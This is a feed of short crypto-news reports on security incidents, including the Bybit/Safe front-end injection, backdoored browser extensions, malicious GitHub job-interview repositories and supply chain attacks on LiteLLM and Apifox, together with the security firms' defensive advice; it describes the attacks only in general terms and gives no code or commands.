π Cybersecurity Alert: Malicious Code Found in Popular Browser Extensions
#Cybersecurity #MaliciousCode #BrowserExtensions #PhishingAttack #OAuth2 #Cyberhaven #ProxySwitchyOmega #SecurityAlert #DataBreach #Backdoor
According to PANews, a security alert was issued by AabyssTeam's founder on the X platform, revealing that Cyberhaven, a security company, fell victim to a phishing email attack. This breach led to the insertion of malicious code into their browser extension, aiming to access users' browser cookies and passwords. Further analysis uncovered that multiple browser extensions, including Proxy SwitchyOmega (V3), were compromised. These affected extensions, available on the Google Store, have impacted 500,000 users and are currently under scrutiny. SlowMist founder Yu Jian shared the alert, explaining that the attack utilized an OAuth2 attack chain. By obtaining the 'extension publishing rights' of the 'target browser extension' developers, attackers released updates with backdoors. These updates could be automatically triggered each time the browser is launched or the extension is reopened, making the backdoor difficult to detect.#Cybersecurity #MaliciousCode #BrowserExtensions #PhishingAttack #OAuth2 #Cyberhaven #ProxySwitchyOmega #SecurityAlert #DataBreach #Backdoor
β€1
π AdsPower Reports Security Breach Involving Malicious Code
#AdsPower #SecurityBreach #MaliciousCode #CyberSecurity #DataBreach #Hacking #BrowserPlugins #LawEnforcement #Investigation
According to Foresight News, AdsPower has announced a security breach that occurred on the evening of January 24. The company's security team identified an intrusion where hackers disseminated malicious code, leading to the alteration of some third-party browser plugins. The technical team promptly addressed the issue by blocking the distribution channel of the malicious code and removing all potentially risky plugins. AdsPower has officially reported the incident to law enforcement authorities in Singapore and has received a police acknowledgment. The investigation into the breach is ongoing.#AdsPower #SecurityBreach #MaliciousCode #CyberSecurity #DataBreach #Hacking #BrowserPlugins #LawEnforcement #Investigation
π Safe Developers' Devices Compromised, Malicious Code Injected
#SafeDevelopers #MaliciousCode #CyberAttack #TransactionSecurity #SlowMist #JavaScript #ByBit #CryptoSecurity
According to Foresight News, SlowMist has reported that the devices of Safe developers were compromised, leading to the injection of malicious code into the front-end. This attack intercepted and altered transaction parameters. Upon swift verification, it was confirmed that the JavaScript files on Safe's front-end contained malicious code. The associated address (0xbdd077f651ebe7f7b3ce16fe5f2b025be2969516) is linked to the malicious execution contract responsible for siphoning off $1.5 billion in assets from ByBit.#SafeDevelopers #MaliciousCode #CyberAttack #TransactionSecurity #SlowMist #JavaScript #ByBit #CryptoSecurity
π Majority Of Stolen Funds In Bybit Hack Remain Traceable
#Bybit #hack #crypto #cryptocurrency #Ethereum #ETH #Bitcoin #BTC #lazarus #funds #blockchain #OTC #P2P #THORChain #maliciouscode #cybersecurity #defi #exchanges #hacking #RUNE
According to CoinDesk, over 77% of the funds stolen in a significant hack on the crypto exchange Bybit remain traceable, while 20% have become untraceable, as reported by CEO Ben Zhou. In an update shared on X early Tuesday, Zhou emphasized the importance of the current and upcoming week for freezing these funds as they begin to clear through exchanges, over-the-counter (OTC) platforms, and peer-to-peer (P2P) networks. The hackers are reportedly attempting to launder the stolen money and convert it into cash.
Approximately 417,348 ether (ETH), valued at around $1 billion, remain traceable on the blockchain after being moved using the privacy-focused THORChain. However, about 20% of the funds, equivalent to roughly 79,655 ETH or $200 million, have "gone dark" through ExCH. A smaller portion, 40,233 ETH or $100 million, passed through OKXβs web3 proxy, but 23,553 ETH, worth $65 million, remain untraceable.
Zhou revealed that the hackers converted 83% of the stolen ETH β 361,255 ETH, or $900 million β into Bitcoin (BTC), distributing it across 6,954 wallets, with an average of 1.71 BTC per wallet using THORChain. THORChain has processed $4.66 billion in swaps in the week ending March 2, marking the highest tally on record, according to data from DefiLlama, generating over $5.5 million in fees from these illicit flows.
The North Korean hacking group Lazarus targeted Bybit in late February by injecting malicious code into SafeWallet, a third-party wallet platform used by the exchange, to steal billions in customer assets. The attackers compromised a developerβs device, allowing them to manipulate a routine wallet transfer and siphon off nearly $1.5 billion in ETH.
Bybit managed to fully restore a 1:1 backing of client assets days after the attack, as previously reported by CoinDesk. Address activity indicates that more than $400 million were purchased through over-the-counter trading, with an additional $300 million acquired directly from exchanges.#Bybit #hack #crypto #cryptocurrency #Ethereum #ETH #Bitcoin #BTC #lazarus #funds #blockchain #OTC #P2P #THORChain #maliciouscode #cybersecurity #defi #exchanges #hacking #RUNE
π Web3 Project Faces USDT Loss Due to Unauthorized Wallet Address
#Web3 #USDT #CryptoSecurity #SmartContracts #Blockchain #AI #MaliciousCode #CryptoCommunity #Investigation
According to BlockBeats, a Web3 startup project has experienced the unauthorized transfer of hundreds of thousands of USDT due to a hard-coded authorized wallet address in its smart contract code. The incident was disclosed by crypto community member Cat (@0xCat_Crypto). A suspicious contract code submitted by an employee is under scrutiny, although the employee denies responsibility, claiming the malicious code was automatically generated by an AI programming assistant without thorough review. Currently, the ownership of the involved wallet and the identity of the code author remain unclear.
SlowMist's Cosine has stated that preliminary investigations have ruled out the possibility of AI-generated malicious code. The investigation involved the use of Cursor and Claude 3.7 models, which showed that the AI auto-completed address did not match the malicious address involved. The malicious address was granted smart contract owner permissions, leading to the complete transfer of project funds.#Web3 #USDT #CryptoSecurity #SmartContracts #Blockchain #AI #MaliciousCode #CryptoCommunity #Investigation
π CoinMarketCap Removes Malicious Code After Security Breach
#CoinMarketCap #SecurityBreach #MaliciousCode #WebsiteSecurity #CryptoSafety #IncidentResponse
According to Odaily, CoinMarketCap announced on the X platform that it has identified and removed malicious code from its website. The team is actively investigating the incident and implementing measures to enhance security. Previously, CoinMarketCap's front end was attacked, resulting in a malicious pop-up window prompting users to 'verify wallet.' CoinMarketCap later tweeted that the malicious code had been removed and all systems were restored to normal, although the tweet was subsequently deleted.#CoinMarketCap #SecurityBreach #MaliciousCode #WebsiteSecurity #CryptoSafety #IncidentResponse
π Security Alert: GitHub Project Exploited in Cryptocurrency Theft
#SecurityAlert #GitHub #CryptocurrencyTheft #OpenSource #MaliciousCode #NodeJS #AssetTheft #CyberSecurity #SocialEngineering #SlowMist #Caution #Isolation #PrivateKey #SOL
According to PANews, a security incident involving a GitHub-hosted open-source project has resulted in the theft of cryptocurrency assets. On July 2, a victim reported using the project named zldp2002/solana-pumpfun-bot, which led to the unauthorized access and theft of their digital assets. The SlowMist security team analyzed the attack, revealing that the perpetrators disguised the malicious code as a legitimate open-source project. This deception encouraged users to download and execute the harmful Node.js project, which contained malicious dependencies. As a result, users' wallet private keys were compromised, leading to asset theft.
The attack involved multiple GitHub accounts working in coordination, which expanded the reach and credibility of the malicious project, making it highly deceptive. This type of attack combines social engineering with technical methods, making it challenging to defend against even within organizations.
SlowMist advises developers and users to exercise extreme caution when dealing with unfamiliar GitHub projects, especially those involving wallet or private key operations. It is recommended to run and debug such projects in isolated environments without sensitive data to mitigate risks.#SecurityAlert #GitHub #CryptocurrencyTheft #OpenSource #MaliciousCode #NodeJS #AssetTheft #CyberSecurity #SocialEngineering #SlowMist #Caution #Isolation #PrivateKey #SOL
π Malicious Code Discovered in GitHub Project Template
#MaliciousCode #GitHub #Cybersecurity #Trojan #Cryptocurrency #Scam #DeveloperCaution #V2EX
According to PANews, a user named evada recently reported on the V2EX website that during a job application process, they were asked to use a GitHub project template provided by the recruiter. It was discovered that the project contained malicious code. Specifically, the logo.png file, which appeared to be an image, actually contained executable code. This code was triggered through the config-overrides.js file with the intent to steal local cryptocurrency private keys.
Evada highlighted that the malicious code sends requests to a specific URL to download a trojan file, which is then set to run automatically at startup, posing significant stealth and danger. V2EX administrator Livid stated that the account involved has been banned, and GitHub has removed the related malicious repository. Several users commented that this new type of scam targeting programmers is highly deceptive, urging developers to exercise caution when running projects from unknown sources.#MaliciousCode #GitHub #Cybersecurity #Trojan #Cryptocurrency #Scam #DeveloperCaution #V2EX
π Web3 Job Scam Alert: Malicious Code Disguised as GitHub Repository
#Web3 #JobScam #CyberSecurity #MaliciousCode #GitHub #Backdoor #DataProtection #ITSecurity #Vigilance #ScamAlert
According to PANews, a recent disclosure by SlowMist highlights a scam involving a purported Web3 team from Ukraine. A community member was asked to clone a GitHub repository during a job interview, which they wisely declined.
The analysis revealed that the repository contained a backdoor. If cloned and executed, it would load malicious code, install harmful dependencies, and steal sensitive browser and wallet data, such as Chrome extension storage and potential mnemonic phrases, leaking them to the attacker's server. This incident underscores the importance of vigilance and the need to avoid running unverified code.#Web3 #JobScam #CyberSecurity #MaliciousCode #GitHub #Backdoor #DataProtection #ITSecurity #Vigilance #ScamAlert
π Steam Game BlockBlasters Linked to Malicious Code and Crypto Losses
#BlockBlasters #Steam #maliciouscode #cryptocurrency #crypto #cryptolosses
According to Foresight News, blockchain investigator ZachXBT has reported that the game BlockBlasters on Steam contains malicious code, leading to approximately $150,000 in cryptocurrency losses. The game has been available for download on the Steam platform for over a month.#BlockBlasters #Steam #maliciouscode #cryptocurrency #crypto #cryptolosses
π Web3 Job Seekers Warned of Malicious Code Traps During Interviews
#Web3 #JobSeekers #MaliciousCode #Cybersecurity #SlowMist #Stealer #CryptoWallets #Bitbucket #PrivateKeys #CyberThreats
According to Odaily, Web3 job seekers have been cautioned about potential malicious code traps during interviews. The warning comes from SlowMist's Cosine, who highlighted an incident where attackers impersonated @seracleofficial, instructing candidates to review and execute code hosted on Bitbucket. Once the victims cloned the code, the program immediately scanned all local .env files, stealing private keys and other sensitive information.
SlowMist experts identified this type of backdoor as a typical stealer, capable of collecting passwords saved in browsers, mnemonic phrases, and private keys from crypto wallets. They emphasized the importance of conducting suspicious code reviews in isolated environments to prevent direct execution on real devices, which could lead to attacks.#Web3 #JobSeekers #MaliciousCode #Cybersecurity #SlowMist #Stealer #CryptoWallets #Bitbucket #PrivateKeys #CyberThreats
π Security Alert Issued Over Malicious Code in Polymarket Trading Bot
#SecurityAlert #MaliciousCode #Polymarket #TradingBot #Cybersecurity #SlowMist #WalletTheft #GitHub
According to BlockBeats, a security warning has been issued by SlowMist Technology's Chief Information Security Officer, 23pds, regarding a malicious code hidden in a Polymarket trading bot program. The program, known as 'polymarket-copy-trading-bot,' was found to contain code that automatically reads users' '.env' files, which include wallet private keys, leading to potential theft of funds. The developer of this program has repeatedly modified and submitted the code on GitHub, intentionally concealing the malicious package.#SecurityAlert #MaliciousCode #Polymarket #TradingBot #Cybersecurity #SlowMist #WalletTheft #GitHub
π GitHub Project Compromised by Malicious Code
#GitHub #MaliciousCode #PolymarketCopyTradingBot #AssetTheft #CyberSecurity #WalletPrivateKeys #Hacker #ExcluderMcpPackage
According to Odaily, the GitHub project known as polymarket-copy-trading-bot has been compromised by malicious code. The program is designed to automatically access the user's .env file upon startup, extracting wallet private keys. These keys are then transmitted to a hacker's server through a concealed malicious dependency package, excluder-mcp-package@1.0.4, resulting in asset theft.#GitHub #MaliciousCode #PolymarketCopyTradingBot #AssetTheft #CyberSecurity #WalletPrivateKeys #Hacker #ExcluderMcpPackage
π Trust Wallet Compensates Users After Security Breach
#TrustWallet #SecurityBreach #APIKeyLeak #MaliciousCode #Compensation #WalletAddresses #AssetsTheft #Sha1HuludAttack #ChromeWebStoreAPI #GitHubCredentials #UserClaims #FixedVersion #WalletSecurity
According to Odaily, a security breach occurred in the Trust Wallet Browser Extension v2.68 between December 24 and 26, 2025, due to an API key leak that led to the upload of malicious code. This incident affected 2,520 wallet addresses, resulting in the theft of approximately $8.5 million in assets. Investigations revealed a connection to the Sha1-Hulud supply chain attack in November, where attackers gained access to the Chrome Web Store API using leaked GitHub credentials.
Trust Wallet has voluntarily decided to compensate affected users and is finalizing the compensation workflow and ownership verification process. The company has begun reaching out to victims who have contacted them officially. Trust Wallet advises affected users to transfer their funds to new wallets immediately and submit claims through the official form. Over 5,000 claims have been received, and the team is reviewing each case individually. Additionally, Trust Wallet has released a fixed version 2.69 and disabled the relevant publishing permissions and credentials.#TrustWallet #SecurityBreach #APIKeyLeak #MaliciousCode #Compensation #WalletAddresses #AssetsTheft #Sha1HuludAttack #ChromeWebStoreAPI #GitHubCredentials #UserClaims #FixedVersion #WalletSecurity
π Trust Wallet Relaunches Chrome Extension and Updates to Version 2.71.0
#TrustWallet #ChromeExtension #Version2.71.0 #CompensationProcess #SecurityIncident #MaliciousCode #Bitcoin #ETH #SOL #CustomerServiceVerification #BTC
According to Odaily, Trust Wallet announced on the X platform that its browser extension is now available again on the Chrome Web Store. Additionally, version 2.71.0 has been released, featuring customer service verification code support to assist with the claims process.
Previously, Trust Wallet initiated a compensation process for victims of a security incident involving its Chrome browser extension. This incident was caused by malicious code embedded in version 2.68 of the software, resulting in the theft of approximately $7 million in assets, including Bitcoin, ETH, and SOL.#TrustWallet #ChromeExtension #Version2.71.0 #CompensationProcess #SecurityIncident #MaliciousCode #Bitcoin #ETH #SOL #CustomerServiceVerification #BTC
π Holdstation Faces Supply Chain Attack Resulting in Significant Losses
#supplychainattack #cybersecurity #userfunds #usdt #accountabstraction #maliciouscode #securitybreach #blockchain #bugbounty
Holdstation, a provider of account abstraction solutions, has experienced a supply chain attack, according to ChainCatcher. The attack involved the theft of developer session tokens, allowing the attacker to bypass two-factor authentication and inject malicious code into an application update, leading to the theft of user funds.
The attack resulted in a loss of 462,000 USDT, with the attacker's address identified as 0xcbfA60B39cfAeaE475f649fB6705bD477219bF8d. In response, the Holdstation team has suspended services and pledged to fully compensate affected users. They are collaborating with security teams to investigate the incident and have issued a message on the blockchain, hoping to encourage the attacker to return the funds through a bug bounty program.#supplychainattack #cybersecurity #userfunds #usdt #accountabstraction #maliciouscode #securitybreach #blockchain #bugbounty
π Supply Chain Attack Targets PyPI Package LiteLLM with Malicious Code
#SupplyChainAttack #PyPI #LiteLLM #MaliciousCode #CyberSecurity #DataBreach #CloudSecurity #Kubernetes #CryptoSecurity #CI_CD #DatabaseSecurity
A recent supply chain attack has compromised the PyPI package LiteLLM, which is downloaded approximately 97 million times monthly. According to NS3.AI, the malicious version of the package was designed to steal sensitive information, including SSH keys, cloud credentials, Kubernetes files, git credentials, environment variables, cryptocurrency wallets, SSL private keys, CI/CD keys, and database passwords. The attack was short-lived, as the malicious code was available for less than an hour. A bug in the implant led to developer Callum McMahon's machine running out of memory and crashing, inadvertently revealing the attack.#SupplyChainAttack #PyPI #LiteLLM #MaliciousCode #CyberSecurity #DataBreach #CloudSecurity #Kubernetes #CryptoSecurity #CI_CD #DatabaseSecurity
π Apifox Desktop Client Faces Supply Chain Attack with Malicious Code Injection
#Apifox #DesktopClient #SupplyChainAttack #MaliciousCode #JavaScript #CredentialTheft #SensitiveDataExposure #RemoteCommandExecution #SecurityBreach #SlowMist #CyberSecurity #APILogs #TokenRevoke #PasswordReset #APIReview
Apifox's desktop client has been targeted in a supply chain attack, according to PANews. The official CDN-hosted front-end script files were injected with highly obfuscated malicious JavaScript code. Users affected by this breach may face risks such as credential theft, sensitive data exposure, and remote command execution, with the malicious code executing automatically and remaining highly concealed.
Security firm SlowMist advises users to immediately revoke all tokens, reset passwords, log out and log back in to invalidate sessions, block the domain *.apifox.it.com, clear local storage, and review API logs and any abnormal activities.#Apifox #DesktopClient #SupplyChainAttack #MaliciousCode #JavaScript #CredentialTheft #SensitiveDataExposure #RemoteCommandExecution #SecurityBreach #SlowMist #CyberSecurity #APILogs #TokenRevoke #PasswordReset #APIReview